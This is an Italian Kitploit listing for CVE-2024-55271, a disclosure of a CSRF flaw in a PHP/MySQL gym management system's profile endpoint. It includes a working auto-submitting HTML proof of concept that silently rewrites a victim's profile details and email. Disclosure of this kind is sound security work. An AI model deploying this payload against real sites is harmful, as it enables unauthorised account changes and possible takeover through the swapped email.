Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-55271 — Sistema di gestione per GYM usando PHP e MYSQL | Kitploit
Strumenti/GitHubGitHub/shoaibalam112/cve-2024-55271
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

Sistema di gestione per GYM usando PHP e MYSQL

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Gym Management System ( CVE-2024-55271 )

Un sistema di gestione della palestra realizzato con PHP e MySQL.

Auditor

Shoaib Alam - Profilo LinkedIn

Descrizione

Vulnerabilità CSRF nella sezione di aggiornamento del profilo

È stata identificata una vulnerabilità di Cross-Site Request Forgery (CSRF) nel sistema di gestione della palestra. Questo problema è presente nella funzionalità di aggiornamento del profilo nel pannello utente.

L'applicazione attualmente non implementa token anti-CSRF, risultando vulnerabile ad attacchi di Cross-Site Request Forgery (CSRF). Questa debolezza di sicurezza interessa in particolare l'endpoint /profile.php. Un utente malintenzionato può sfruttare questa falla per eseguire modifiche non autorizzate a informazioni sensibili dell'utente, come indirizzo, nome e numero di telefono. Ciò potrebbe potenzialmente compromettere l'integrità degli account utente e portare a ulteriori problemi di sicurezza.

Endpoint vulnerabile: /profile.php

Proof of Concept (PoC)

Di seguito è riportato un proof of concept che dimostra la vulnerabilità CSRF. Questo PoC è stato generato utilizzando Burp Suite Professional.

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Scarica lo strumento